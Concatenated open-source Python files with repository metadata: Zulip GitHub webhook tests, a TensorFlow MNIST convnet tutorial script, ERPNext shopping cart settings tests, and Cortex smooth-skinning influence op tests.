expected_message = u"baxterthehacker added [octocat](https://github.com/octocat) to [public-repo](https://github.com/baxterthehacker/public-repo)"
self.send_and_test_stream_message('member', self.EXPECTED_SUBJECT_REPO_EVENTS, expected_message, HTTP_X_GITHUB_EVENT='member')
def test_pull_request_opened_msg(self):
# type: () -> None
expected_message = u"baxterthehacker opened [PR](https://github.com/baxterthehacker/public-repo/pull/1)\nfrom `changes` to `master`\n\n~~~ quote\nThis is a pretty simple change that we need to pull into master.\n~~~"
self.send_and_test_stream_message('opened_pull_request', self.EXPECTED_SUBJECT_PR_EVENTS, expected_message, HTTP_X_GITHUB_EVENT='pull_request')
def test_pull_request_synchronized_msg(self):
# type: () -> None
expected_message = u"baxterthehacker updated [PR](https://github.com/baxterthehacker/public-repo/pull/1)\nfrom `changes` to `master`"
self.send_and_test_stream_message('synchronized_pull_request', self.EXPECTED_SUBJECT_PR_EVENTS, expected_message, HTTP_X_GITHUB_EVENT='pull_request')
def test_pull_request_closed_msg(self):
# type: () -> None
expected_message = u"baxterthehacker closed without merge [PR](https://github.com/baxterthehacker/public-repo/pull/1)"
self.send_and_test_stream_message('closed_pull_request', self.EXPECTED_SUBJECT_PR_EVENTS, expected_message, HTTP_X_GITHUB_EVENT='pull_request')
def test_pull_request_merged_msg(self):
# type: () -> None
expected_message = u"baxterthehacker merged [PR](https://github.com/baxterthehacker/public-repo/pull/1)"
self.send_and_test_stream_message('merged_pull_request', self.EXPECTED_SUBJECT_PR_EVENTS, expected_message, HTTP_X_GITHUB_EVENT='pull_request')
def test_public_msg(self):
# type: () -> None
expected_message = u"baxterthehacker made [the repository](https://github.com/baxterthehacker/public-repo) public"
self.send_and_test_stream_message('public', self.EXPECTED_SUBJECT_REPO_EVENTS, expected_message, HTTP_X_GITHUB_EVENT='public')
def test_wiki_pages_msg(self):
# type: () -> None
expected_message = u"jasonrudolph:\n* created [Home](https://github.com/baxterthehacker/public-repo/wiki/Home)\n* created [Home](https://github.com/baxterthehacker/public-repo/wiki/Home)"
self.send_and_test_stream_message('wiki_pages', self.EXPECTED_SUBJECT_WIKI_EVENTS, expected_message, HTTP_X_GITHUB_EVENT='gollum')
def test_watch_msg(self):
# type: () -> None
expected_message = u"baxterthehacker starred [the repository](https://github.com/baxterthehacker/public-repo)"
self.send_and_test_stream_message('watch_repository', self.EXPECTED_SUBJECT_REPO_EVENTS, expected_message, HTTP_X_GITHUB_EVENT='watch')
def test_repository_msg(self):
# type: () -> None
expected_message = u"baxterthehacker created [the repository](https://github.com/baxterandthehackers/public-repo)"
self.send_and_test_stream_message('repository', self.EXPECTED_SUBJECT_REPO_EVENTS, expected_message, HTTP_X_GITHUB_EVENT='repository')
def test_team_add_msg(self):
# type: () -> None
expected_message = u"[The repository](https://github.com/baxterandthehackers/public-repo) was added to team github"
self.send_and_test_stream_message('team_add', self.EXPECTED_SUBJECT_REPO_EVENTS, expected_message, HTTP_X_GITHUB_EVENT='team_add')
def test_release_msg(self):
# type: () -> None
expected_message = u"baxterthehacker published [the release](https://github.com/baxterthehacker/public-repo/releases/tag/0.0.1)"
self.send_and_test_stream_message('release', self.EXPECTED_SUBJECT_REPO_EVENTS, expected_message, HTTP_X_GITHUB_EVENT='release')
def test_page_build_msg(self):
# type: () -> None
expected_message = u"Github Pages build, trigerred by baxterthehacker, is built"
self.send_and_test_stream_message('page_build', self.EXPECTED_SUBJECT_REPO_EVENTS, expected_message, HTTP_X_GITHUB_EVENT='page_build')
def test_status_msg(self):
# type: () -> None
expected_message = u"[9049f12](https://github.com/baxterthehacker/public-repo/commit/9049f1265b7d61be4a8904a9a27120d2064dab3b) changed its status to success"
self.send_and_test_stream_message('status', self.EXPECTED_SUBJECT_REPO_EVENTS, expected_message, HTTP_X_GITHUB_EVENT='status')
def test_pull_request_review_msg(self):
# type: () -> None
expected_message = u"baxterthehacker submitted [PR Review](https://github.com/baxterthehacker/public-repo/pull/1#pullrequestreview-2626884)"
self.send_and_test_stream_message('pull_request_review', self.EXPECTED_SUBJECT_PR_EVENTS, expected_message, HTTP_X_GITHUB_EVENT='pull_request_review')
def test_pull_request_review_comment_msg(self):
# type: () -> None
expected_message = u"baxterthehacker created [PR Review Comment](https://github.com/baxterthehacker/public-repo/pull/1#discussion_r29724692)\n\n~~~ quote\nMaybe you should use more emojji on this line.\n~~~"
self.send_and_test_stream_message('pull_request_review_comment', self.EXPECTED_SUBJECT_PR_EVENTS, expected_message, HTTP_X_GITHUB_EVENT='pull_request_review_comment')
def test_push_tag_msg(self):
# type: () -> None
expected_message = u"baxterthehacker pushed tag abc"
self.send_and_test_stream_message('push_tag', self.EXPECTED_SUBJECT_REPO_EVENTS, expected_message, HTTP_X_GITHUB_EVENT='push')
def test_pull_request_edited_msg(self):
# type: () -> None
expected_message = u"baxterthehacker edited [PR](https://github.com/baxterthehacker/public-repo/pull/1)\nfrom `changes` to `master`"
self.send_and_test_stream_message('edited_pull_request', self.EXPECTED_SUBJECT_PR_EVENTS, expected_message,
HTTP_X_GITHUB_EVENT='pull_request')
def test_pull_request_assigned_msg(self):
# type: () -> None
expected_message = u"baxterthehacker assigned [PR](https://github.com/baxterthehacker/public-repo/pull/1) to baxterthehacker"
self.send_and_test_stream_message('assigned_pull_request', self.EXPECTED_SUBJECT_PR_EVENTS, expected_message,
HTTP_X_GITHUB_EVENT='pull_request')
def test_pull_request_unassigned_msg(self):
# type: () -> None
expected_message = u"eeshangarg unassigned [PR](https://github.com/zulip-test-org/helloworld/pull/1)"
self.send_and_test_stream_message(
'unassigned_pull_request',
'helloworld / PR #1 Mention that Zulip rocks!',
expected_message,
HTTP_X_GITHUB_EVENT='pull_request'
)
@patch('zerver.webhooks.github_webhook.view.check_send_message')
def test_pull_request_labeled_ignore(self, check_send_message_mock):
# type: (MagicMock) -> None
payload = self.get_body('labeled_pull_request')
result = self.client_post(self.url, payload, HTTP_X_GITHUB_EVENT='pull_request', content_type="application/json")
self.assertFalse(check_send_message_mock.called)
self.assert_json_success(result)
@patch('zerver.webhooks.github_webhook.view.check_send_message')
def test_pull_request_unlabeled_ignore(self, check_send_message_mock):
# type: (MagicMock) -> None
payload = self.get_body('unlabeled_pull_request')
result = self.client_post(self.url, payload, HTTP_X_GITHUB_EVENT='pull_request', content_type="application/json")
self.assertFalse(check_send_message_mock.called)
self.assert_json_success(result)
@patch('zerver.webhooks.github_webhook.view.check_send_message')
def test_pull_request_request_review_ignore(self, check_send_message_mock):
# type: (MagicMock) -> None
payload = self.get_body('request_review_pull_request')
result = self.client_post(self.url, payload, HTTP_X_GITHUB_EVENT='pull_request', content_type="application/json")
self.assertFalse(check_send_message_mock.called)
self.assert_json_success(result)
@patch('zerver.webhooks.github_webhook.view.check_send_message')
def test_pull_request_request_review_remove_ignore(self, check_send_message_mock):
# type: (MagicMock) -> None
payload = self.get_body('request_review_removed_pull_request')
result = self.client_post(self.url, payload, HTTP_X_GITHUB_EVENT='pull_request', content_type="application/json")
self.assertFalse(check_send_message_mock.called)
self.assert_json_success(result)
@patch('zerver.webhooks.github_webhook.view.check_send_message')
def test_push_1_commit_filtered_by_branches_ignore(self, check_send_message_mock):
# type: (MagicMock) -> None
self.url = self.build_webhook_url(branches='master,development')
payload = self.get_body('push_1_commit')
result = self.client_post(self.url, payload, HTTP_X_GITHUB_EVENT='push', content_type="application/json")
self.assertFalse(check_send_message_mock.called)
self.assert_json_success(result)
@patch('zerver.webhooks.github_webhook.view.check_send_message')
def test_push_50_commits_filtered_by_branches_ignore(self, check_send_message_mock):
# type: (MagicMock) -> None
self.url = self.build_webhook_url(branches='master,development')
payload = self.get_body('push_50_commits')
result = self.client_post(self.url, payload, HTTP_X_GITHUB_EVENT='push', content_type="application/json")
self.assertFalse(check_send_message_mock.called)
self.assert_json_success(result)
@patch('zerver.webhooks.github_webhook.view.check_send_message')
def test_push_multiple_comitters_filtered_by_branches_ignore(self, check_send_message_mock):
# type: (MagicMock) -> None
self.url = self.build_webhook_url(branches='master,development')
payload = self.get_body('push_multiple_committers')
result = self.client_post(self.url, payload, HTTP_X_GITHUB_EVENT='push', content_type="application/json")
self.assertFalse(check_send_message_mock.called)
self.assert_json_success(result)
@patch('zerver.webhooks.github_webhook.view.check_send_message')
def test_push_multiple_comitters_with_others_filtered_by_branches_ignore(self, check_send_message_mock):
# type: (MagicMock) -> None
self.url = self.build_webhook_url(branches='master,development')
payload = self.get_body('push_multiple_committers_with_others')
result = self.client_post(self.url, payload, HTTP_X_GITHUB_EVENT='push', content_type="application/json")
self.assertFalse(check_send_message_mock.called)
self.assert_json_success(result)
|
verma-varsha/zulip
|
zerver/webhooks/github_webhook/tests.py
|
Python
|
apache-2.0
| 22,570
|
""" Using convolutional net on MNIST dataset of handwritten digit
(http://yann.lecun.com/exdb/mnist/)
"""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import os
import time
import tensorflow as tf
from tensorflow.examples.tutorials.mnist import input_data
N_CLASSES = 10
# Step 1: Read in data
# using TF Learn's built in function to load MNIST data to the folder data/mnist
mnist = input_data.read_data_sets("/data/mnist", one_hot=True)
# Step 2: Define paramaters for the model
LEARNING_RATE = 0.001
BATCH_SIZE = 128
SKIP_STEP = 10
DROPOUT = 0.75
N_EPOCHS = 1
# Step 3: create placeholders for features and labels
# each image in the MNIST data is of shape 28*28 = 784
# therefore, each image is represented with a 1x784 tensor
# We'll be doing dropout for hidden layer so we'll need a placeholder
# for the dropout probability too
# Use None for shape so we can change the batch_size once we've built the graph
with tf.name_scope('data'):
X = tf.placeholder(tf.float32, [None, 784], name="X_placeholder")
Y = tf.placeholder(tf.float32, [None, 10], name="Y_placeholder")
dropout = tf.placeholder(tf.float32, name='dropout')
# Step 4 + 5: create weights + do inference
# the model is conv -> relu -> pool -> conv -> relu -> pool -> fully connected -> softmax
global_step = tf.Variable(0, dtype=tf.int32, trainable=False, name='global_step')
with tf.variable_scope('conv1') as scope:
# first, reshape the image to [BATCH_SIZE, 28, 28, 1] to make it work with tf.nn.conv2d
images = tf.reshape(X, shape=[-1, 28, 28, 1])
kernel = tf.get_variable('kernel', [5, 5, 1, 32],
initializer=tf.truncated_normal_initializer())
biases = tf.get_variable('biases', [32],
initializer=tf.random_normal_initializer())
conv = tf.nn.conv2d(images, kernel, strides=[1, 1, 1, 1], padding='SAME')
conv1 = tf.nn.relu(conv + biases, name=scope.name)
# output is of dimension BATCH_SIZE x 28 x 28 x 32
with tf.variable_scope('pool1') as scope:
pool1 = tf.nn.max_pool(conv1, ksize=[1, 2, 2, 1], strides=[1, 2, 2, 1],
padding='SAME')
# output is of dimension BATCH_SIZE x 14 x 14 x 32
with tf.variable_scope('conv2') as scope:
# similar to conv1, except kernel now is of the size 5 x 5 x 32 x 64
kernel = tf.get_variable('kernels', [5, 5, 32, 64],
initializer=tf.truncated_normal_initializer())
biases = tf.get_variable('biases', [64],
initializer=tf.random_normal_initializer())
conv = tf.nn.conv2d(pool1, kernel, strides=[1, 1, 1, 1], padding='SAME')
conv2 = tf.nn.relu(conv + biases, name=scope.name)
# output is of dimension BATCH_SIZE x 14 x 14 x 64
with tf.variable_scope('pool2') as scope:
# similar to pool1
pool2 = tf.nn.max_pool(conv2, ksize=[1, 2, 2, 1], strides=[1, 2, 2, 1],
padding='SAME')
# output is of dimension BATCH_SIZE x 7 x 7 x 64
with tf.variable_scope('fc') as scope:
# use weight of dimension 7 * 7 * 64 x 1024
input_features = 7 * 7 * 64
w = tf.get_variable('weights', [input_features, 1024],
initializer=tf.truncated_normal_initializer())
b = tf.get_variable('biases', [1024],
initializer=tf.random_normal_initializer())
# reshape pool2 to 2 dimensional
pool2 = tf.reshape(pool2, [-1, input_features])
fc = tf.nn.relu(tf.matmul(pool2, w) + b, name='relu')
fc = tf.nn.dropout(fc, dropout, name='relu_dropout')
with tf.variable_scope('softmax_linear') as scope:
w = tf.get_variable('weights', [1024, N_CLASSES],
initializer=tf.truncated_normal_initializer())
b = tf.get_variable('biases', [N_CLASSES],
initializer=tf.random_normal_initializer())
logits = tf.matmul(fc, w) + b
# Step 6: define loss function
# use softmax cross entropy with logits as the loss function
# compute mean cross entropy, softmax is applied internally
with tf.name_scope('loss'):
entropy = tf.nn.softmax_cross_entropy_with_logits(logits, Y)
loss = tf.reduce_mean(entropy, name='loss')
# Step 7: define training op
# using gradient descent with learning rate of LEARNING_RATE to minimize cost
optimizer = tf.train.AdamOptimizer(LEARNING_RATE).minimize(loss,
global_step=global_step)
with tf.Session() as sess:
sess.run(tf.global_variables_initializer())
saver = tf.train.Saver()
# to visualize using TensorBoard
writer = tf.summary.FileWriter('./my_graph/mnist', sess.graph)
ckpt = tf.train.get_checkpoint_state(os.path.dirname('checkpoints/convnet_mnist_new/checkpoint'))
# if that checkpoint exists, restore from checkpoint
if ckpt and ckpt.model_checkpoint_path:
saver.restore(sess, ckpt.model_checkpoint_path)
initial_step = global_step.eval()
start_time = time.time()
n_batches = int(mnist.train.num_examples / BATCH_SIZE)
total_loss = 0.0
for index in range(initial_step, n_batches * N_EPOCHS): # train the model n_epochs times
X_batch, Y_batch = mnist.train.next_batch(BATCH_SIZE)
_, loss_batch = sess.run([optimizer, loss],
feed_dict={X: X_batch, Y:Y_batch, dropout: DROPOUT})
total_loss += loss_batch
if (index + 1) % SKIP_STEP == 0:
print('Average loss at step {}: {:5.1f}'.format(index + 1, total_loss / SKIP_STEP))
total_loss = 0.0
saver.save(sess, 'checkpoints/convnet_mnist_new/mnist-convnet', index)
print("Optimization Finished!") # should be around 0.35 after 25 epochs
print("Total time: {0} seconds".format(time.time() - start_time))
# test the model
n_batches = int(mnist.test.num_examples/BATCH_SIZE)
total_correct_preds = 0
for i in range(n_batches):
X_batch, Y_batch = mnist.test.next_batch(BATCH_SIZE)
_, loss_batch, logits_batch = sess.run([optimizer, loss, logits],
feed_dict={X: X_batch, Y:Y_batch, dropout: DROPOUT})
preds = tf.nn.softmax(logits_batch)
correct_preds = tf.equal(tf.argmax(preds, 1), tf.argmax(Y_batch, 1))
accuracy = tf.reduce_sum(tf.cast(correct_preds, tf.float32))
total_correct_preds += sess.run(accuracy)
print("Accuracy {0}".format(total_correct_preds/mnist.test.num_examples))
|
adukic/nd101
|
tf-stanford-tutorials/examples/07_convnet_mnist.py
|
Python
|
mit
| 6,514
|
# Copyright (c) 2015, Frappe Technologies Pvt. Ltd. and Contributors
# License: GNU General Public License v3. See license.txt
# For license information, please see license.txt
from __future__ import unicode_literals
import frappe
import unittest
from erpnext.shopping_cart.doctype.shopping_cart_settings.shopping_cart_settings import ShoppingCartSetupError
class TestShoppingCartSettings(unittest.TestCase):
def setUp(self):
frappe.db.sql("""delete from `tabSingles` where doctype="Shipping Cart Settings" """)
frappe.db.sql("""delete from `tabShopping Cart Price List`""")
frappe.db.sql("""delete from `tabShopping Cart Taxes and Charges Master`""")
frappe.db.sql("""delete from `tabShopping Cart Shipping Rule`""")
def get_cart_settings(self):
return frappe.get_doc({"doctype": "Shopping Cart Settings",
"company": "_Test Company"})
def test_price_list_territory_overlap(self):
cart_settings = self.get_cart_settings()
def _add_price_list(price_list):
cart_settings.append("price_lists", {
"doctype": "Shopping Cart Price List",
"selling_price_list": price_list
})
for price_list in ("_Test Price List Rest of the World", "_Test Price List India",
"_Test Price List"):
_add_price_list(price_list)
controller = cart_settings
controller.validate_overlapping_territories("price_lists", "selling_price_list")
_add_price_list("_Test Price List 2")
controller = cart_settings
self.assertRaises(ShoppingCartSetupError, controller.validate_overlapping_territories,
"price_lists", "selling_price_list")
return cart_settings
def test_taxes_territory_overlap(self):
cart_settings = self.get_cart_settings()
def _add_tax_master(tax_master):
cart_settings.append("sales_taxes_and_charges_masters", {
"doctype": "Shopping Cart Taxes and Charges Master",
"sales_taxes_and_charges_master": tax_master
})
for tax_master in ("_Test Sales Taxes and Charges Template", "_Test India Tax Master"):
_add_tax_master(tax_master)
controller = cart_settings
controller.validate_overlapping_territories("sales_taxes_and_charges_masters",
"sales_taxes_and_charges_master")
_add_tax_master("_Test Sales Taxes and Charges Template - Rest of the World")
controller = cart_settings
self.assertRaises(ShoppingCartSetupError, controller.validate_overlapping_territories,
"sales_taxes_and_charges_masters", "sales_taxes_and_charges_master")
def test_exchange_rate_exists(self):
frappe.db.sql("""delete from `tabCurrency Exchange`""")
cart_settings = self.test_price_list_territory_overlap()
controller = cart_settings
self.assertRaises(ShoppingCartSetupError, controller.validate_exchange_rates_exist)
from erpnext.setup.doctype.currency_exchange.test_currency_exchange import test_records as \
currency_exchange_records
frappe.get_doc(currency_exchange_records[0]).insert()
controller.validate_exchange_rates_exist()
|
ThiagoGarciaAlves/erpnext
|
erpnext/shopping_cart/doctype/shopping_cart_settings/test_shopping_cart_settings.py
|
Python
|
agpl-3.0
| 2,960
|
##########################################################################
#
# Copyright (c) 2010, Image Engine Design Inc. All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are
# met:
#
# * Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
#
# * Redistributions in binary form must reproduce the above copyright
# notice, this list of conditions and the following disclaimer in the
# documentation and/or other materials provided with the distribution.
#
# * Neither the name of Image Engine Design nor the names of any
# other contributors to this software may be used to endorse or
# promote products derived from this software without specific prior
# written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS
# IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO,
# THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR
# PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR
# CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL,
# EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO,
# PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR
# PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF
# LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING
# NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS
# SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
#
##########################################################################
import math
import unittest
import random
import imath
import IECore
import IECoreScene
class AddAndRemoveSmoothSkinningInfluencesOpTest( unittest.TestCase ) :
def createSSD( self, names, poses, indices ) :
offsets = IECore.IntVectorData( [0, 2, 5, 6, 8] )
counts = IECore.IntVectorData( [2, 3, 1, 2, 3] )
weights = IECore.FloatVectorData( [0.7, 0.7, 0.2, 0.6, 0.0, 0.1, 1.2, 0.8, 0.4, 0.6, 0.4] )
ssd = IECoreScene.SmoothSkinningData( names, poses, offsets, counts, indices, weights )
return ssd
def original( self ) :
names = IECore.StringVectorData( [ 'jointA', 'jointB', 'jointC' ] )
poses = IECore.M44fVectorData( [imath.M44f(1),imath.M44f(2),imath.M44f(3)] )
indices = IECore.IntVectorData( [0, 1, 0, 1, 2, 1, 1, 2, 0, 1, 2] )
return self.createSSD( names, poses, indices )
def added( self ) :
names = IECore.StringVectorData( [ 'newA', 'jointA', 'newC', 'newB', 'jointB', 'jointC', 'newD' ] )
poses = IECore.M44fVectorData( [ imath.M44f(4), imath.M44f(1), imath.M44f(6), imath.M44f(5), imath.M44f(2), imath.M44f(3), imath.M44f(7) ] )
indices = IECore.IntVectorData( [1, 4, 1, 4, 5, 4, 4, 5, 1, 4, 5] )
return self.createSSD( names, poses, indices )
def removed( self ) :
names = IECore.StringVectorData( [ 'jointA', 'newC', 'newB', 'jointC' ] )
poses = IECore.M44fVectorData( [ imath.M44f(1), imath.M44f(6), imath.M44f(5), imath.M44f(3) ] )
offsets = IECore.IntVectorData( [0, 1, 3, 3, 4] )
counts = IECore.IntVectorData( [1, 2, 0, 1, 2] )
indices = IECore.IntVectorData( [0, 0, 3, 3, 0, 3] )
weights = IECore.FloatVectorData( [0.7, 0.2, 0.0, 0.8, 0.4, 0.4] )
ssd = IECoreScene.SmoothSkinningData( names, poses, offsets, counts, indices, weights )
return ssd
def testTypes( self ) :
""" Test AddSmoothSkinningInfluencesOp and RemoveSmoothSkinningInfluencesOp types"""
ssd = self.original()
op = IECoreScene.AddSmoothSkinningInfluencesOp()
self.assertEqual( type(op), IECoreScene.AddSmoothSkinningInfluencesOp )
self.assertEqual( op.typeId(), IECoreScene.TypeId.AddSmoothSkinningInfluencesOp )
op.parameters()['input'].setValue( IECore.IntData(1) )
self.assertRaises( RuntimeError, op.operate )
op = IECoreScene.RemoveSmoothSkinningInfluencesOp()
self.assertEqual( type(op), IECoreScene.RemoveSmoothSkinningInfluencesOp )
self.assertEqual( op.typeId(), IECoreScene.TypeId.RemoveSmoothSkinningInfluencesOp )
op.parameters()['input'].setValue( IECore.IntData(1) )
self.assertRaises( RuntimeError, op.operate )
def testAddingNothing( self ) :
""" Test AddSmoothSkinningInfluencesOp with no new influences"""
ssd = self.original()
op = IECoreScene.AddSmoothSkinningInfluencesOp()
op.parameters()['input'].setValue( ssd )
result = op.operate()
self.assertEqual( result.influenceNames(), ssd.influenceNames() )
self.assertEqual( result.influencePose(), ssd.influencePose() )
self.assertEqual( result.pointInfluenceIndices(), ssd.pointInfluenceIndices() )
self.assertEqual( result.pointIndexOffsets(), ssd.pointIndexOffsets() )
self.assertEqual( result.pointInfluenceCounts(), ssd.pointInfluenceCounts() )
self.assertEqual( result.pointInfluenceWeights(), ssd.pointInfluenceWeights() )
self.assertEqual( result, ssd )
def testAdding( self ) :
""" Test AddSmoothSkinningInfluencesOp"""
ssd = self.original()
op = IECoreScene.AddSmoothSkinningInfluencesOp()
op.parameters()['input'].setValue( ssd )
op.parameters()['influenceNames'].setValue( IECore.StringVectorData( [ "newA", "newB", "newC", "newD" ] ) )
op.parameters()['influencePose'].setValue( IECore.M44fVectorData( [ imath.M44f(4), imath.M44f(5), imath.M44f(6), imath.M44f(7) ] ) )
op.parameters()['indices'].setValue( IECore.IntVectorData( [ 0, 2, 2, 6 ] ) )
result = op.operate()
self.assertNotEqual( result.influenceNames(), ssd.influenceNames() )
self.assertNotEqual( result.influencePose(), ssd.influencePose() )
self.assertNotEqual( result.pointInfluenceIndices(), ssd.pointInfluenceIndices() )
self.assertEqual( result.pointIndexOffsets(), ssd.pointIndexOffsets() )
self.assertEqual( result.pointInfluenceCounts(), ssd.pointInfluenceCounts() )
self.assertEqual( result.pointInfluenceWeights(), ssd.pointInfluenceWeights() )
self.assertNotEqual( result, ssd )
added = self.added()
self.assertEqual( result.influenceNames(), added.influenceNames() )
self.assertEqual( result.influencePose(), added.influencePose() )
self.assertEqual( result.pointIndexOffsets(), added.pointIndexOffsets() )
self.assertEqual( result.pointInfluenceCounts(), added.pointInfluenceCounts() )
self.assertEqual( result.pointInfluenceIndices(), added.pointInfluenceIndices() )
self.assertEqual( result.pointInfluenceWeights(), added.pointInfluenceWeights() )
self.assertEqual( result, added )
def testRemovingNothing( self ) :
""" Test RemoveSmoothSkinningInfluencesOp with no new influences"""
ssd = self.original()
op = IECoreScene.RemoveSmoothSkinningInfluencesOp()
op.parameters()['input'].setValue( ssd )
result = op.operate()
self.assertEqual( result.influenceNames(), ssd.influenceNames() )
self.assertEqual( result.influencePose(), ssd.influencePose() )
self.assertEqual( result.pointInfluenceIndices(), ssd.pointInfluenceIndices() )
self.assertEqual( result.pointIndexOffsets(), ssd.pointIndexOffsets() )
self.assertEqual( result.pointInfluenceCounts(), ssd.pointInfluenceCounts() )
self.assertEqual( result.pointInfluenceWeights(), ssd.pointInfluenceWeights() )
self.assertEqual( result, ssd )
def testRemovingNamedMode( self ) :
""" Test RemoveSmoothSkinningInfluencesOp in named mode"""
ssd = self.added()
op = IECoreScene.RemoveSmoothSkinningInfluencesOp()
op.parameters()['input'].setValue( ssd )
op.parameters()['mode'].setValue( IECoreScene.RemoveSmoothSkinningInfluencesOp.Mode.Named )
op.parameters()['influenceNames'].setValue( IECore.StringVectorData( [ "newA", "jointB", "newD" ] ) )
result = op.operate()
self.assertNotEqual( result.influenceNames(), ssd.influenceNames() )
self.assertNotEqual( result.influencePose(), ssd.influencePose() )
self.assertNotEqual( result.pointInfluenceIndices(), ssd.pointInfluenceIndices() )
self.assertNotEqual( result.pointIndexOffsets(), ssd.pointIndexOffsets() )
self.assertNotEqual( result.pointInfluenceCounts(), ssd.pointInfluenceCounts() )
self.assertNotEqual( result.pointInfluenceWeights(), ssd.pointInfluenceWeights() )
self.assertNotEqual( result, ssd )
removed = self.removed()
self.assertEqual( result.influenceNames(), removed.influenceNames() )
self.assertEqual( result.influencePose(), removed.influencePose() )
self.assertEqual( result.pointIndexOffsets(), removed.pointIndexOffsets() )
self.assertEqual( result.pointInfluenceCounts(), removed.pointInfluenceCounts() )
self.assertEqual( result.pointInfluenceIndices(), removed.pointInfluenceIndices() )
self.assertEqual( result.pointInfluenceWeights(), removed.pointInfluenceWeights() )
self.assertEqual( result, removed )
def testRemovingIndexedMode( self ) :
""" Test RemoveSmoothSkinningInfluencesOp in index mode"""
ssd = self.added()
op = IECoreScene.RemoveSmoothSkinningInfluencesOp()
op.parameters()['input'].setValue( ssd )
op.parameters()['mode'].setValue( IECoreScene.RemoveSmoothSkinningInfluencesOp.Mode.Indexed )
op.parameters()['indices'].setValue( IECore.IntVectorData( [ 0, 4, 6 ] ) )
result = op.operate()
self.assertNotEqual( result.influenceNames(), ssd.influenceNames() )
self.assertNotEqual( result.influencePose(), ssd.influencePose() )
self.assertNotEqual( result.pointInfluenceIndices(), ssd.pointInfluenceIndices() )
self.assertNotEqual( result.pointIndexOffsets(), ssd.pointIndexOffsets() )
self.assertNotEqual( result.pointInfluenceCounts(), ssd.pointInfluenceCounts() )
self.assertNotEqual( result.pointInfluenceWeights(), ssd.pointInfluenceWeights() )
self.assertNotEqual( result, ssd )
removed = self.removed()
self.assertEqual( result.influenceNames(), removed.influenceNames() )
self.assertEqual( result.influencePose(), removed.influencePose() )
self.assertEqual( result.pointIndexOffsets(), removed.pointIndexOffsets() )
self.assertEqual( result.pointInfluenceCounts(), removed.pointInfluenceCounts() )
self.assertEqual( result.pointInfluenceIndices(), removed.pointInfluenceIndices() )
self.assertEqual( result.pointInfluenceWeights(), removed.pointInfluenceWeights() )
self.assertEqual( result, removed )
def testRemovingWeightlessMode( self ) :
""" Test RemoveSmoothSkinningInfluencesOp in weightless mode"""
ssd = self.added()
op = IECoreScene.RemoveSmoothSkinningInfluencesOp()
op.parameters()['input'].setValue( ssd )
op.parameters()['mode'].setValue( IECoreScene.RemoveSmoothSkinningInfluencesOp.Mode.Weightless )
result = op.operate()
self.assertNotEqual( result.influenceNames(), ssd.influenceNames() )
self.assertNotEqual( result.influencePose(), ssd.influencePose() )
self.assertNotEqual( result.pointInfluenceIndices(), ssd.pointInfluenceIndices() )
self.assertEqual( result.pointIndexOffsets(), ssd.pointIndexOffsets() )
self.assertEqual( result.pointInfluenceCounts(), ssd.pointInfluenceCounts() )
self.assertEqual( result.pointInfluenceWeights(), ssd.pointInfluenceWeights() )
self.assertNotEqual( result, ssd )
removed = self.original()
self.assertEqual( result.influenceNames(), removed.influenceNames() )
self.assertEqual( result.influencePose(), removed.influencePose() )
self.assertEqual( result.pointIndexOffsets(), removed.pointIndexOffsets() )
self.assertEqual( result.pointInfluenceCounts(), removed.pointInfluenceCounts() )
self.assertEqual( result.pointInfluenceIndices(), removed.pointInfluenceIndices() )
self.assertEqual( result.pointInfluenceWeights(), removed.pointInfluenceWeights() )
self.assertEqual( result, removed )
def testAddOpErrorStates( self ) :
""" Test AddSmoothSkinningInfluencesOp with various error states"""
ssd = self.original()
op = IECoreScene.AddSmoothSkinningInfluencesOp()
op.parameters()['input'].setValue( ssd )
op.parameters()['influenceNames'].setValue( IECore.StringVectorData( [ "newA", "newB", "newC" ] ) )
op.parameters()['influencePose'].setValue( IECore.M44fVectorData( [ imath.M44f(1), imath.M44f(2) ] ) )
op.parameters()['indices'].setValue( IECore.IntVectorData( [ 1, 3 ] ) )
# wrong number of pose matrices
self.assertRaises( RuntimeError, op.operate )
# wrong number of indices
op.parameters()['influencePose'].setValue( IECore.M44fVectorData( [ imath.M44f(1), imath.M44f(2), imath.M44f(3) ] ) )
self.assertRaises( RuntimeError, op.operate )
# index validity
op.parameters()['indices'].setValue( IECore.IntVectorData( [ 1, 3, 6 ] ) )
self.assertRaises( RuntimeError, op.operate )
# existing influenceName
op.parameters()['indices'].setValue( IECore.IntVectorData( [ 1, 2, 3 ] ) )
op.parameters()['influenceNames'].setValue( IECore.StringVectorData( [ "jointA", "newB", "newC" ] ) )
self.assertRaises( RuntimeError, op.operate )
def testRemoveOpErrorStates( self ) :
""" Test RemoveSmoothSkinningInfluencesOp with various error states"""
ssd = self.original()
op = IECoreScene.RemoveSmoothSkinningInfluencesOp()
op.parameters()['input'].setValue( ssd )
op.parameters()['influenceNames'].setValue( IECore.StringVectorData( [ "newA", "newB", "newC" ] ) )
# index validity
op.parameters()['mode'].setValue( IECoreScene.RemoveSmoothSkinningInfluencesOp.Mode.Indexed )
op.parameters()['indices'].setValue( IECore.IntVectorData( [ 1, 3 ] ) )
self.assertRaises( RuntimeError, op.operate )
# name validity
op.parameters()['mode'].setValue( IECoreScene.RemoveSmoothSkinningInfluencesOp.Mode.Named )
op.parameters()['influenceNames'].setValue( IECore.StringVectorData( [ "jointFAKE", "newB", "newC" ] ) )
self.assertRaises( RuntimeError, op.operate )
if __name__ == "__main__":
unittest.main()
|
appleseedhq/cortex
|
test/IECoreScene/AddAndRemoveSmoothSkinningInfluencesOpTest.py
|
Python
|
